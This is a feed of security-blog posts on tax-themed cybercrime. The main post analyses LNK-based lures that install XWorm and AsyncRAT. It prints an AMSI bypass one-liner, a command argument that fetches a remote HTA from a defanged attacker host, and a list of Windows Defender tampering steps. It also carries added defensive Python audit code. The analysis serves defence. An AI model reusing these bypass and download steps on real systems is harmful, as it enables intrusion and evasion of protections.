irs - X-Industry - Red Sky Alliance
2024-03-28T20:57:07Z
https://redskyalliance.org/xindustry/feed/tag/irs

Tax Time 2023
https://redskyalliance.org/xindustry/tax-time-2023
2023-04-14T16:30:00.000Z
Bill Schenkelberg
https://redskyalliance.org/members/BillSchenkelberg
<div><p>It is tax time again in the US. And that means scammers are out there trying to steal your information. Targeting calendar-based events enables threat actors to prepare ahead of time and have a new selection of targets on rotation. This report covers a few examples of malware that take advantage of tax season. Although such attacks may seem repetitive to the casual observer, threat actors would not continue to target taxpayers if previous attacks had not been successful. And they were.<a href="#_ftn1">[1]</a></p>
<p>XWorm Delivered Through Tax Scam </p>
<p>Researchers became aware of a curious-looking archive file hosted in an open directory at www[.]farmaciasmv[.]com/citrix/2022%20tax_documents[.]zip, which has since been removed.</p>
<p><em>Figure 1. Empty open directory that hosted 2022%20tax_documents[.]zip</em></p>
<p>The zip file contains the following files:</p>
<p>Annual Withdrawal.xlsx (SHA2: 59bb292565ebc86800e5e4d625d3c19f98afe2261d3da1a8e2f9b45ec76153a0)</p>
<p>Robert tax_docs.pdf (SHA2: a9f4b054ea128529c62a8ff25f1439651f045e443adf5ff11fb5bd29f1333a7a)</p>
<p><em>Figure 2. Contents of the 2022%20tax_documents[.]zip</em></p>
<p>The XLSX file is a benign decoy file that contains financial data from an unknown source.</p>
<p><em>Figure 3. Contents of the Annual Withdrawal.xlsx</em></p>
<p>The other file is malicious. Despite Robert tax_docs.pdf having a PDF icon, it is different from what it seems. The file is actually a link (LNK) file that launches the legitimate script (C:\Windows\System32\SyncAppvPublishingServer.vbs), which has a known issue of taking command line arguments. The link file exploits this issue and feeds the legitimate script with the following command line argument to download and execute a remote “note.hta”:</p>
<p>;\W_\*2\\\m_h_a_e ('http'+'://datacenter002[.]myftp[.]biz/documents/note.'+'hta')</p>
<p>The downloaded note.hta uses PowerShell to download another remote file hosted on hxxp://datacenter002[.]myftp[.]biz/documents/note[.]gif, which was not available at the time of our investigation. Finding another note.gif (SHA2: 0487ef401345aa17c6aaeac23151219863e1363f82fe76edd0066bbf3fb07715) based on the same infection chain let us continue our quest to the payload.</p>
<p>note.gif is a PowerShell script that creates the following files:</p>
<p>C:\Users\Public\onedrive.vbs (SHA2: 92C1767EE4A954B93D6AFA9AE83FE82B82D2867D919D0359DCF2C8DA75FB8C7C)</p>
<p>C:\Users\Public\test.vbs (SHA2: ADBA59F1495965684EEB4C5DAAD67F732FEB5E9183AE05EB869E20C88CAD7327)</p>
<p>C:\Users\Public\onedrive.ps1 (SHA2: 7A9705A424A634A321DB9F36B61D74B953A44D44EDC429F7641BF830870572FC)</p>
<p>Once launched, it executes the onedrive.vbs and test.vbs files.</p>
<p>test.vbs creates %usertemp%\Note.txt, a clean file containing fake "QUARTERLY TAX PAYMENTS FOR 2022" data.</p>
<p><em>Figure 4. Note.txt containing fake “QUARTERLY TAX PAYMENTS FOR 2022” data</em></p>
<p>onedrive.vbs runs the previously created onedrive.ps1 filled with activities designed to hamper Windows Defender. It first executes the following known AMSI (Antimalware Scripting Interface) bypass:</p>
<p>[Ref].Assembly.GetType(‘System.Management.Automation.AmsiUtils’)</p>
<p>.GetField(‘amsiInitFailed’,’NonPublic,Static’).SetValue($null,$true)</p>
<p>It also disables AMSI by hijacking the COM server, changing it from "%windir%\system32\amsi.dll" to "C:\IDontExist.dll". The PowerShell script then performs the following actions to alter Windows Defender settings:</p>
<ul>
<li>Adds the following exclusions to Windows Defender:
<ul>
<li>Extensions: .bat, .ppam, .xls, .docx, .bat, .exe, .vbs, .js</li>
<li>File paths: C:\, D:\, E:\</li>
<li>Processes: explorer.exe, kernel32.dll, aspnet_compiler.exe, cvtres.exe, CasPol.exe, csc.exe, Msbuild.exe, ilasm.exe, InstallUtil.exe, jsc.exe, Calc.exe, powershell.exe, rundll32.exe, conhost.exe, Cscript.exe, mshta.exe, cmd.exe, DefenderisasuckingAntivirus, wscript.exe</li>
</ul>
</li>
<li>Allows known Windows Defender Threat IDs to execute</li>
<li>Disables Windows Defender Attack Surface Reduction (ASR) rules</li>
<li>Disables the following Windows Defender features:
<ul>
<li>Intrusion Prevention System</li>
<li>IO AV Protection (does not scan downloaded files and attachments)</li>
<li>Realtime monitoring</li>
<li>Script scanning</li>
<li>Controlled folder access protection</li>
<li>PUA protection</li>
<li>Scheduled scan</li>
</ul>
</li>
<li>Sets Network Protection to audit mode in Windows Defender (allows users to visit known malicious sites but logs them in the event log)</li>
<li>Disables MAPS (Microsoft Active Protection Service) reporting</li>
<li>Never submits samples to Microsoft</li>
<li>Allows severe/high/moderate/low-level threats to execute</li>
<li>Disables the "administrator in Admin Approval Mode" user type (disables UAC prompts)</li>
<li>Stops the WinDefend service (Windows Defender)</li>
<li>Disables the startup of the WinDefend service</li>
<li>Deletes the WinDefend service</li>
<li>Creates a user named "System32" with the password “123” (no quotes)</li>
<li>Adds the System32 user to both the "administrators" group and the "Remote Desktop Users" group</li>
<li>Stops the Microsoft Defender Antivirus Network Inspection Service (WdNisSvc)</li>
<li>Turns off Windows Firewall</li>
</ul>
<p>The PowerShell script finally uses reflective loading to load a binary into memory that injects XWorm RAT version 3.1.</p>
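<p>An added example, not part of the original report: a Python audit that checks a Microsoft Defender preference export for the tampering listed above. It assumes the input is the JSON produced by <code>Get-MpPreference | ConvertTo-Json</code>; the baseline values, the runnable-extension and script-host sets, and the sample export are constructed for illustration.</p>

```python
"""Audit a Defender preference export for exclusion abuse and disabled protections."""
import json
import re

# A path exclusion such as C:\ removes a whole drive from scanning.
DRIVE_ROOT = re.compile(r"^[A-Za-z]:\\?$")

# Assumed sets: extensions that run code, and script hosts / LOLBins
# taken from the process list in the report.
RUNNABLE_EXTS = {"exe", "bat", "cmd", "vbs", "js", "ps1", "hta", "wsf"}
SCRIPT_HOSTS = {"powershell.exe", "mshta.exe", "wscript.exe",
                "cscript.exe", "cmd.exe", "rundll32.exe"}

# Assumed hardened baseline; replace with your organisation's policy.
BASELINE = {
    "DisableRealtimeMonitoring": False,
    "DisableScriptScanning": False,
    "DisableIOAVProtection": False,
    "DisableIntrusionPreventionSystem": False,
    "EnableControlledFolderAccess": 1,  # 0 = disabled
    "PUAProtection": 1,                 # 0 = disabled
    "EnableNetworkProtection": 1,       # 2 = audit only
    "MAPSReporting": 2,                 # 0 = disabled
    "SubmitSamplesConsent": 1,          # 2 = never send
}

# Constructed sample modelled on the settings described in the report.
SAMPLE_JSON = r'''
{
  "ExclusionPath": ["C:\\", "D:\\", "E:\\"],
  "ExclusionExtension": [".bat", ".ppam", ".xls", ".docx", ".exe", ".vbs", ".js"],
  "ExclusionProcess": ["explorer.exe", "powershell.exe", "mshta.exe", "wscript.exe"],
  "DisableRealtimeMonitoring": true,
  "DisableScriptScanning": true,
  "DisableIOAVProtection": true,
  "DisableIntrusionPreventionSystem": true,
  "EnableControlledFolderAccess": 0,
  "PUAProtection": 0,
  "EnableNetworkProtection": 2,
  "MAPSReporting": 0,
  "SubmitSamplesConsent": 2
}
'''


def _as_list(value):
    """Exports may hold null, a single string, or an array."""
    if value is None:
        return []
    if isinstance(value, str):
        return [value]
    return list(value)


def audit_preferences(prefs, baseline=BASELINE):
    """Return (kind, detail) findings for one preference dictionary."""
    findings = []
    for path in _as_list(prefs.get("ExclusionPath")):
        if DRIVE_ROOT.match(path.strip()):
            findings.append(("drive-root-exclusion", path))
    for ext in _as_list(prefs.get("ExclusionExtension")):
        if ext.lower().lstrip(".") in RUNNABLE_EXTS:
            findings.append(("runnable-extension-exclusion", ext))
    for proc in _as_list(prefs.get("ExclusionProcess")):
        image = proc.replace("/", "\\").rsplit("\\", 1)[-1].lower()
        if image in SCRIPT_HOSTS:
            findings.append(("script-host-process-exclusion", proc))
    for key, expected in baseline.items():
        if key in prefs and prefs[key] != expected:
            findings.append(("baseline-drift", f"{key}={prefs[key]!r} (expected {expected!r})"))
    return findings


def audit_json(text, baseline=BASELINE):
    """Parse an exported JSON document and audit it."""
    return audit_preferences(json.loads(text), baseline)


if __name__ == "__main__":
    for kind, detail in audit_json(SAMPLE_JSON):
        print(f"{kind:32} {detail}")
```

<p>The WinDefend service changes, the new "System32" account and the firewall state described in the list are not part of this export and need separate checks.</p>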
<p>Furthermore, we discovered other files that follow a similar attack pattern: “Mary tax docs.pdf.lnk” (SHA2: 6dee21d581eac2214e3ea7259bf9cb3e0cc31b442a372ffba00f82aa858050f0) and “Wilson tax_docs.pdf.lnk” (SHA2: c06cf72149d52b8a7c73b38c075156df4c458f633c3031c3c0ce32741ad1518e), which were used in March 2023. As with the attack mentioned previously, these link files are disguised as PDF files to fool potential victims into opening them.</p>
<p>“Mary tax docs.pdf.lnk” and a clean Microsoft Office file, “R&P Sales Summary.docx”, are included in an archive file labeled “2022 tax docs.zip”. Running the link file triggers the download and execution of “doc.pdf” from “hxxp://datacenter11[.]myftp[.]org/notepad/”. The “doc.pdf” is actually a VBA file that uses PowerShell to pull and run “hxxp://datacenter11[.]myftp[.]org/met/a[.]mp3”. While “a.mp3” is not available for investigation, OSINT (Open Source Intelligence) indicates that the XWorm malware is likely delivered to the victim’s machine.</p>
<p>XWorm</p>
<p>Based on the evidence accumulated during our research, we have high confidence that the 2022%20tax_documents[.]zip file we initially analyzed delivers XWorm.</p>
<p>XWorm is a commodity RAT (Remote Access Trojan) reportedly sold in underground forums for $30 to $150. XWorm supports typical RAT functions, such as taking screenshots, keylogging, and taking control of a compromised machine by abusing Virtual Network Computing (VNC), a technique infamously known as Hidden VNC (HVNC). XWorm can also encrypt files, essentially acting in a similar fashion to ransomware.</p>
<p>Below are screenshots of a recently cracked version of XWorm v3.1:</p>
<p><em>Figure 5. Leaked cracked version of XWorm v3.1</em></p>
<p><em>Figure 6. Some of the functionalities supported by XWorm v3.1</em></p>
<p><em>Figure 7. Download page of the cracked version of XWorm v.3.1</em></p>
<p>Going back to the first example, “2022%20tax_documents[.]zip”, we found that it was hosted on the open directory “www[.]farmaciasmv[.]com/citrix/”. Analysts also found another page on the same domain that was likely used for phishing: hxxp://farmaciasmv[.]com/sharefile/citrix/2022%20taxes[.]html. The files involved in this attack were submitted to VirusTotal. Researchers don’t believe victims just wander into such malicious sites by accident. Based on our experience, they were likely lured via malicious links in spam emails.</p>
<p>Manual interactions are required up until the files inside the zip file are extracted, and the link file is manually run. The basic security practice of not opening files from unknown sources can prevent infection and the damages that follow.</p>
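<p>An added example, not part of the original report: a Python triage routine that flags shortcut files posing as documents inside a ZIP, by header bytes as well as by name, since Explorer does not display the .lnk extension. The decoy-extension list and the sample archive are constructed; the shortcut stubs carry only the header bytes and are not working link files.</p>

```python
"""Triage a ZIP archive for Windows shortcut (LNK) files posing as documents."""
import io
import struct
import zipfile
from pathlib import PurePosixPath
from typing import List, Optional, Tuple

# MS-SHLLINK header: HeaderSize (0x4C) followed by the LinkCLSID
# 00021401-0000-0000-C000-000000000046 in its on-disk byte order.
LNK_MAGIC = struct.pack("<I", 0x4C) + bytes.fromhex("0114020000000000c000000000000046")

# Extensions a lure typically imitates (assumed list, extend as needed).
DECOY_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt", ".jpg", ".png"}


def classify_member(name: str, head: bytes) -> Optional[str]:
    """Classify one archive member from its name and first bytes."""
    if not head.startswith(LNK_MAGIC):
        return None
    suffixes = [s.lower() for s in PurePosixPath(name).suffixes]
    if not suffixes or suffixes[-1] != ".lnk":
        # Shortcut content under a document-style name, e.g. "x.pdf".
        return "lnk-content-with-non-lnk-name"
    if len(suffixes) >= 2 and suffixes[-2] in DECOY_EXTS:
        # "x.pdf.lnk" is shown as "x.pdf" because .lnk is never displayed.
        return "lnk-double-extension"
    return "lnk-in-archive"


def triage_zip(data: bytes) -> List[Tuple[str, str]]:
    """Return (member name, verdict) for every suspicious member."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            if info.flag_bits & 0x1:
                # Password-protected member: cannot be inspected, report it.
                findings.append((info.filename, "encrypted-not-inspected"))
                continue
            with zf.open(info) as fh:
                head = fh.read(len(LNK_MAGIC))
            verdict = classify_member(info.filename, head)
            if verdict:
                findings.append((info.filename, verdict))
    return findings


def build_sample_zip() -> bytes:
    """Constructed archive using file names from the report."""
    stub = LNK_MAGIC + b"\x00" * 56  # 76-byte header stub, not a usable shortcut
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Annual Withdrawal.xlsx", b"constructed spreadsheet bytes")
        zf.writestr("Robert tax_docs.pdf", stub)
        zf.writestr("Mary tax docs.pdf.lnk", stub)
        zf.writestr("notes/readme.lnk", stub)
    return buf.getvalue()


if __name__ == "__main__":
    for member, verdict in triage_zip(build_sample_zip()):
        print(f"{verdict:32} {member}")
```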
<p>Dual Malware Wielding:</p>
<p>Another tax-related attack researchers came across is an image file named “TaxReturn2022.img” (SHA2: 6658d4b14f0093a2fccd2f57b5bf9fa18d09cda5d42036f280b41e5beb1ff2fe) that contains the following files:</p>
<p>TaxReturn2022.pdf.lnk (SHA2: 180a79cff5ef91ecd744a35b2e433d0a4aae0e4d3b87c40e8e51f5ca02aac4d6)</p>
<p>TaxReturns2022.pdf.lnk (SHA2: fa862d43a85a9ea6f046f3edc743b897bba86348c04b8d62ba6eb27f951edf55)</p>
<p>TaxReturns2022.zip (SHA2: c4599d4270ba8ef58fb8f1219ecff864acd83145c368ada9406a341d6f4a4fbf)</p>
<p>We were able to locate another file, “TaxReturns2022.iso” (SHA2: bb7138a106ee2e0a384896316679c750e3287b51fc16a5e65ccd1e44911162d6), that contains identical files.</p>
<p><em>Figure 8. Contents of TaxReturn2022.img</em></p>
<p><em>Figure 9. Contents of TaxReturns2022.iso</em></p>
<p>Unfortunately, the infection vector for both files has not been identified, but the likely attack avenue is an email containing malicious attachments and links. The TaxReturns2022.zip file within both archives is password-protected with an unknown password, and its contents cannot be extracted.</p>
<p>As with the previous example, “TaxReturn2022.pdf.lnk” has a PDF icon. However, it’s a link (shortcut) file, as seen in Figure 4. </p>
<p>Manually executing the lnk file triggers the download of wed.hta from hxxp://179.43.175[.]187/pqpf/ and saves it as %USERAPPDATA%\wed.hta (SHA2: 0cbaf95b9d4df27442d753dc4cb600eda0a7ecb95e4071f380f69f5f3c89adb1). <br /> The downloaded file is an HTA web file containing VBScript code for the next action and a lot of junk code. It eventually runs:</p>
<p>powershell.exe -ExecutionPolicy UnRestricted [powershell code</p>
<p>This PowerShell code is designed to execute whatever was downloaded. In this case, it downloads “TaxReturn2022.pdf” from hxxp://179.43.175[.]187/pqpf/, saves it as %USERAPPDATA%\TaxReturn2022.pdf, and opens it. Unfortunately, this PDF file is a clean decoy file that also requires an unidentified password to open.</p>
<p>The PowerShell code sets the following registry entry to open the downloaded PDF file every time the computer boots and adds the HIDDEN file attribute to the file:</p>
<p>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\iXqrVo = [location of downloaded PDF file]</p>
<p>This behavior led us to believe that the threat actor behind this attack relies on templates and uses them without really knowing what they are because there is no valid reason to open a decoy PDF file at every startup, and adding the HIDDEN file attribute is usually reserved for executables and DLLs.</p>
<p>The script then sleeps five seconds before downloading and executing whatever has been downloaded. In this case, it downloads TCywxTOvZk.wsf from hxxp://[redacted].67[.]12:222/ and saves it as %USERAPPDATA%\TCywxTOvZk.wsf (SHA2: 351b0514feaa6a2fc21af25ad7c6c9bed93e38ef896d3fb6c8633924d8615e2d). Note that part of the IP address is masked because the directory is still accessible.</p>
<p>TCywxTOvZk.wsf has only three meaningful lines of code out of almost 2840 lines and downloads and runs hxxp://[redacted].67[.]12:222/no[.]txt (SHA2: d7c63c4d488918aa09fcbd2012d041ed440377af51a87e757c40df3725b1eb07). no.txt contains VBScript code that downloads and executes hxxp://[redacted].67[.]12:222/j[.]png (SHA2: 460d093a55b930e733c60575f82183cd0edd52ec6b927cdb4a93dc5da7f0ac9c), which is a PowerShell script that creates the following files:</p>
<p>C:\ProgramData\Document\py.ps1</p>
<p>C:\ProgramData\schtasks\Microsoft.bat</p>
<p>C:\ProgramData\Document\x.ps1</p>
<p>The script then runs Microsoft.bat, which uses MSHTA.exe to run PowerShell code to run py.ps1. The .ps1 file contains two PE files (stored in $apprun and $appme). It uses 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe' to reflectively load $apprun, which then loads $appme, which was identified as an AsyncRAT variant that connects to the attacker’s Command-and-Control (C2) server located at nulled2nd[.]camdvr[.]org:6666.</p>
<p>We also found another .lnk file (SHA2: c0a59b28919282b3c45a9619410ea95e35f86dbf43266e6f9a25b94f5948018b) hidden in TaxReturns2022.pdf.iso (SHA2: ee1299f4e56c7f5af243df63192f1c7574152c0600edc49c37b9f8b703da02f2).</p>
<p>This link file goes through the same infection chain as the previous one:</p>
<ul>
<li>The link file downloads and executes hxxp://[redacted].67[.]12:222/xa[.]hta</li>
<li>xa[.]hta downloads and executes hxxp://[redacted].67[.]12:222/qDxcmqPPmI[.]wsf</li>
<li>qDxcmqPPmI[.]wsf was not available at the time of the investigation. However, OSINT led us to find the next action.</li>
<li>qDxcmqPPmI[.]wsf downloads and executes hxxp://[redacted].67[.]12:222/no[.]txt</li>
<li>no[.]txt downloads and executes hxxp://[redacted].67[.]12:222/j[.]png</li>
<li>j[.]png creates py.ps1 and x.ps1. It also creates and runs Microsoft.bat</li>
<li>Microsoft.bat runs py.ps1, which eventually installs AsyncRAT on the compromised machine</li>
</ul>
<p>The attacker left the hosting location of the malicious files wide open.</p>
<p><em>Figure 10. Files hosted on the attacker’s open directory</em></p>
<p>The directory contains a few files whose names are associated with Adobe Acrobat Reader DC. This indicates that the threat actor also leverages Adobe as a lure to install the AsyncRAT variant.</p>
<p>readerdc64_en_l_cra_mdr_install_update.exe[.]lnk (SHA2: 653fcea661d8f7d996210dcdbcad110f0dcca8e7bbc906bb0a4d12e3ab674483)</p>
<p>readerdc64_en_l_cra_mdr_install_update[.]exe (SHA2: 1b012d01c86be5d68959504d362c52170b27d726cf2943e2e0250506a29c765a) – this is a legitimate Adobe Acrobat Reader DC installer.</p>
<p>reader64[.]hta (SHA2: 3b2e776ab44a711a52de88b02c007897eed137b62ecc7fb51bbb3089941bda1a)</p>
<p>readerdc64_en_ka_cra_mdr_install_update[.]wsf (SHA2: d2f0995f9184170386360d5eb5990e38a289052e6a15706613c9568a207da7d7)</p>
<p>AsyncRAT contains features designed to steal information from compromised machines and a clipper feature that monitors the clipboard for crypto wallet address swapping, which means victims may end up paying more than their taxes.</p>
<table width="100%">
<tbody>
<tr>
<td>
<p><strong>Affected Platforms: Windows</strong></p>
<p><strong>Impacted Users: Windows users</strong></p>
<p><strong>Impact: Compromised machines are under the control of the threat actor, potentially resulting in stolen personally identifiable information (PII), credential theft, financial loss, etc.</strong></p>
<p><strong>Severity Level: Medium</strong></p>
</td>
</tr>
</tbody>
</table>
<p>But however potential victims end up with the “TaxReturn2022.img” and “TaxReturns2022.pdf.iso” files on their system, users still need to manually mount them and run the fake PDFs to trigger the infection chain. A little caution can go a long way toward protecting yourself against tax-related malware.</p>
<p>Conclusion: The attacks covered in this blog are the tip of the iceberg. Attackers make every attempt to scam taxpayers for financial gain and data exfiltration for future attacks. In the end, those looking to save a dime, in this case, from the IRS, often find that greed endangers them in the cyber world.</p>
<p>For additional information, please refer to the “<a href="https://www.irs.gov/newsroom/tax-scams-consumer-alerts">Tax Scams/Consumer Alerts</a>” alert issued by the IRS for other tips on protecting yourself from tax-related scams.</p>
<p>IOCs below:</p>
<p>Network IOCs</p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization, and we would like to thank Sentinel Labs for this great report. For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or feedback@redskyalliance.com</p>
<p>Weekly Cyber Intelligence Briefings:</p>
<ul>
<li>Reporting: https://www.redskyalliance.org/</li>
<li>Website: https://www.wapacklabs.com/</li>
<li>LinkedIn: https://www.linkedin.com/company/64265941</li>
</ul>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/5504229295967742989">https://attendee.gotowebinar.com/register/5504229295967742989</a></p>
<p><a href="#_ftnref1">[1]</a> <a href="https://www.fortinet.com/blog/threat-research/tax-scammers-at-large?lctg=141970831">https://www.fortinet.com/blog/threat-research/tax-scammers-at-large?lctg=141970831</a></p></div>

Cyber Justice
https://redskyalliance.org/xindustry/cyber-justice
2022-05-12T17:29:42.000Z
Bill Schenkelberg
https://redskyalliance.org/members/BillSchenkelberg
<div><p>Three people were handed years-long sentences in federal court on Wednesday for a range of crimes connected to a widespread hacking and identity theft campaign. Alessandro Doreus, Jean Elie Doreus Jovin and Djouman Doreus pleaded guilty to conspiracy to commit fraud and aggravated identity theft in September 2021. Prosecutors said they defrauded hundreds of people from 2015 to 2020 by gaining access to Social Security numbers, account numbers, usernames and passwords.</p>
<p>A US District Judge gave 29-year-old Florida resident Alessandro Doreus and 34-year-old Georgia resident Jovin sentences of six years and nine months in federal prison. Djouman Doreus, 29 years old and also a Floridian, was handed a five-year sentence. The trio used the stolen information to take out loans, open credit cards and create financial accounts, frequently emailing each other files containing thousands of names, Social Security numbers, and dates of birth. In at least one instance, they used the fraudulently opened credit cards to pay fake vendor accounts that Jovin opened and controlled. They also filed fraudulent tax returns as a way to get refunds from the IRS. Law enforcement found that Jovin purchased stolen credentials on a dark web marketplace that gave him access to computer servers. The Justice Department said Jovin shared these compromised server credentials with Alessandro Doreus.<a href="#_ftn1">[1]</a></p>
<p>These cyber criminals managed to evade law enforcement by opening dozens of email accounts. They were eventually stopped in August 2020 when the FBI executed a search warrant at the home of Alessandro Doreus and found the information of at least 300 people. During the raid, the FBI seized nearly $500,000 that they believe resulted from the group’s scams. “The Doreus trio wrongly assumed that their crimes would be untraceable, hidden under a cloak of Internet anonymity,” said IRS-CI Special Agent in Charge Brian Payne.</p>
<p>Nearly $7 billion was lost through internet crimes in 2021, surpassing a record set in 2020 by about $1.7 billion, according to the FBI’s annual Internet Crime Report. The center received 847,376 complaints throughout the year, with most concerning ransomware, business e-mail compromise (BEC) schemes, and the criminal use of cryptocurrency. It represents a 7% increase compared to 2020 and the FBI received an average of more than 2,300 complaints each day. The FBI said BEC crimes led to 19,954 complaints with an adjusted loss of nearly $2.4 billion in 2021. </p>
<p>In regulatory action, the U.S. Department of Transportation's Pipeline and Hazardous Materials Safety Administration (PHMSA) has proposed a penalty of nearly $1 million to Colonial Pipeline for violating federal safety regulations, worsening the impact of the ransomware attack last year. The $986,400 penalty is the result of an inspection conducted by the regulator of the pipeline operator's control room management (CRM) procedures from January through November 2020.<a href="#_ftn2">[2]</a> </p>
<p>The PHMSA said that "a probable failure to adequately plan and prepare for manual shutdown and restart of its pipeline system [...] contributed to the national impacts when the pipeline remained out of service after the May 2021 cyberattack."</p>
<p>Colonial Pipeline, operator of the largest US fuel pipeline, was forced to temporarily take its systems offline in the wake of a DarkSide ransomware attack in early May 2021, disrupting gas supply and prompting a regional emergency declaration across 17 states. The incident also saw the company paying out $4.4 million in ransom to the cybercrime syndicate to regain access to its computer network, although the US government managed to recover a significant chunk of the digital funds paid. "The pipeline shutdown impacted numerous refineries' ability to move refined product, and supply shortages created wide-spread societal impacts long after the restart," PHMSA said in a Notice of Probable Violation and Proposed Compliance Order. "Colonial Pipeline's ad-hoc approach toward consideration of a 'manual restart' created the potential for increased risks to the pipeline's integrity as well as additional delays in restart, exacerbating the supply issues and societal impacts."</p>
<p>In response, "This notice is the first step in a multi-step regulatory process and we look forward to engaging with PHMSA to resolve these matters," a spokesperson for Colonial Pipeline told media sources, adding that its "incident command structure facilitates a deliberate approach when responding to events. As the 2021 cybersecurity incident demonstrated, Colonial's approach to operating manually gives us the flexibility and structure necessary to ensure continued safe operations as we adapt to unplanned events. Our coordination with government stakeholders was timely, efficient and effective as evidenced by our ability to quickly restart the pipeline in a safe manner five days after we were attacked, which followed localized manual operations conducted before the official restart."</p>
<p><strong>Justice has many twists and turns</strong>.</p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization and wishes to share cyber security views from across the globe. For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or <a href="mailto:feedback@wapacklabs.com">feedback@wapacklabs.com</a></p>
<p><a href="#_ftnref1">[1]</a> <a href="https://therecord.media/hackers-sentenced-florida-georgia-identity-theft-tax-fraud/">https://therecord.media/hackers-sentenced-florida-georgia-identity-theft-tax-fraud/</a></p>
<p><a href="#_ftnref2">[2]</a> <a href="https://thehackernews.com/2022/05/us-proposes-1-million-fine-on-colonial.html">https://thehackernews.com/2022/05/us-proposes-1-million-fine-on-colonial.html</a></p></div>

INTELLIGENCE REPORT: EDUCATION / GOVERNMENT SECTORS
https://redskyalliance.org/xindustry/intelligence-report-education-government-sectors
2021-04-09T13:04:56.000Z
Bill Schenkelberg
https://redskyalliance.org/members/BillSchenkelberg
<div><h2>Activity Summary - Week Ending 9 April 2021:</h2>
<ul>
<li>Red Sky Alliance identified 34,654 connections from new unique IP Addresses</li>
<li>Analysts identified 2,753 new IP addresses participating in various Botnets</li>
<li>Vacar Auto Electronics Co. is Keylogged</li>
<li>Babydraco Webshells</li>
<li>RemRAT Botnet</li>
<li>April 15<sup>th</sup> is Coming - US IRS scams</li>
<li>Accellion and UC</li>
<li>Brown University under attack</li>
<li>EU Government Institutions</li>
<li>PLA Shanghai Police – Hacked files</li>
</ul>
<p>Link to full report: IR-21-099-001_weekly_099_FINAL.pdf</p></div>

INTELLIGENCE REPORT: MANUFACTURING SECTOR
https://redskyalliance.org/xindustry/intelligence-report-manufacturing-sector
2021-04-02T12:47:34.000Z
Bill Schenkelberg
https://redskyalliance.org/members/BillSchenkelberg
<div><h2>Activity Summary - Week Ending 2 April 2021:</h2>
<ul>
<li>Red Sky Alliance identified 34,034 connections from new unique IP addresses</li>
<li>Analysts identified 3,876 new IP addresses participating in various Botnets</li>
<li>20 new unique email accounts compromised with Keyloggers were observed this week</li>
<li>Soccer player’s name Berat Can Sonmez is being used to lure Victims</li>
<li>EggShell Malware</li>
<li>New US-IRS Phishing Campaign</li>
<li>WordPress Vulnerabilities</li>
<li>ClearURL and Google</li>
<li>Honeywell and Molson Coors Attacked</li>
<li>Manufacturing IT & OT</li>
<li>Cyber-attacks up 207% in New Delhi</li>
<li>Amazon and Unions</li>
</ul>
<p>Link to full report: IR-21-092-001_Manufactweekly_092_FINAL.pdf</p></div>

Phishing Season Never Ends
https://redskyalliance.org/xindustry/phishing-season-never-ends
2021-03-07T19:43:51.000Z
Bill Schenkelberg
https://redskyalliance.org/members/BillSchenkelberg
<div><p>As the 2020 tax preparation season begins in the US, the Internal Revenue Service (IRS) is warning that it is seeing more signs of cyber criminals spoofing the agency's domains and incorporating its logos and language into phishing campaigns. Authorities are additionally cautioning about other fraud campaigns that spoof US government departments, with some using themes capitalizing on COVID-19 economic relief programs. A tempting lure to many.</p>
<p>During February 2020, the IRS published a notification to tax professionals describing a phishing campaign that spoofs the agency's likeness, with cyber crooks attempting to steal Electronic Filing Identification Numbers. The IRS issues these numbers to individuals or firms that have been approved as authorized IRS e-file providers. In this phishing email scam, the hackers are trying to entice tax preparers to email documents that would disclose their identities and Electronic Filing Identification Numbers. The cyber criminals can then use this information to file fraudulent returns by impersonating the tax professional, the IRS notes.<a href="#_ftn1">[1]</a></p>
<p>The IRS warning notes that swindlers are also impersonating potential clients for tax preparers. This approach has become more effective because more transactions are being remotely conducted due to the COVID-19 pandemic. These phishing emails likely contained a malicious attachment that, when opened, would download malware, such as information stealers designed to record keystrokes or harvest credentials. Besides Electronic Filing Identification Numbers, the fraudsters might attempt to steal tax pros' Preparer Tax Identification Numbers (TIN) or e-services usernames and passwords, according to the IRS.</p>
<p>Cyber criminals are getting better and more proficient at spoofing government domains for their phishing campaigns and incorporating logos and language to give the messages a legitimate appearance, security experts say. </p>
<p>Besides the IRS, other federal agencies have uncovered black hat hackers spoofing their sites, especially as part of fraud campaigns designed to take advantage of federal COVID-19 economic relief programs. As an example, last year the security firm Malwarebytes uncovered a phishing campaign spoofing a US Small Business Administration (SBA) loan offer in an attempt to steal banking credentials and other personal data.</p>
<p>The Financial Industry Regulatory Authority (FINRA), which helps self-regulate brokerage firms and exchange markets in the US, has also warned about fraudsters creating spoofed websites and domains using members' real names and images to steal personal information and credentials. These types of spoofing or phishing campaigns often are launched when new websites are created to support new government benefits programs.</p>
<p>The goal of these campaigns is to steal credentials to gain access to victims' financial accounts, or to lure funds away from the target recipient. Once new government benefits programs are established, it is not long before threat actors begin mimicking these sites, and they are often successful. Often, the threat actor will design their phishing kits with official government logos and website footers to add a level of authenticity.</p>
<p>A May 2020 report from Proofpoint tracked about 300 phishing campaigns that spoofed government domains or incorporated proper language and logos in phishing emails. Many of these malicious campaigns began around the time tax season started last year and during the COVID-19 pandemic. Fraudsters have recently spoofed tax and other government agencies in the UK and Europe as well. This is not just a US problem.</p>
<p>A senior manager with the security firm Lookout says that their research shows that one in 15 US government workers (federal, state and local) encountered a phishing email or threat in 2020. He also notes that mobile phishing emails have increased 37% in 2020, in part because fraudsters can buy phishing kits on underground markets. </p>
<p>MediaPRO, a Seattle-based provider of security training, theorizes that phishing campaigns will be better checked due to the recent SolarWinds hack, combined with the current US president's heightened focus on cybersecurity. Experts agree that this will result in higher cyber vigilance within government agencies, and that is good. </p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the lab directly at 1-844-492-7225, or <a href="mailto:feedback@wapacklabs.com">feedback@wapacklabs.com</a> </p>
